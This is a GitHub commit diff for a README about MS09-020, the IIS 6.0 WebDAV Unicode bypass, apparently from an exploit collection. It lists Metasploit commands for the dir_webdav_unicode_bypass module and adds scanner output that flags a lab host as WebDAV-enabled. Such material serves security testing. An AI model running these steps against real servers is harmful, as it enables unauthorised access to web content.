Skip to content

Commit 7e06055

Browse files
committed
MS09-020-IIS6.0
1 parent 816fb33 commit 7e06055

File tree

1 file changed

+8
-1
lines changed

1 file changed

+8
-1
lines changed

MS09-020/README.md

Lines changed: 8 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@ iis6.0.exe command
1717
![iis6](iis6.0.png)
1818

1919
## load the module within the Metasploit
20-
[msf](https://www.rapid7.com/db/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass)
20+
[msf judgment](https://www.rapid7.com/db/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass)
2121
```
2222
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
2323
msf auxiliary(dir_webdav_unicode_bypass) > show actions
@@ -26,4 +26,11 @@ msf auxiliary(dir_webdav_unicode_bypass) > set ACTION <action-name>
2626
msf auxiliary(dir_webdav_unicode_bypass) > show options
2727
...show and set options...
2828
msf auxiliary(dir_webdav_unicode_bypass) > run
29+
```
30+
```
31+
msf auxiliary(webdav_scanner) > run
32+
33+
[+] 192.168.16.136 (Microsoft-IIS/6.0) has WEBDAV ENABLED
34+
[*] Scanned 1 of 1 hosts (100% complete)
35+
[*] Auxiliary module execution completed
2936
```

0 commit comments

Comments
 (0)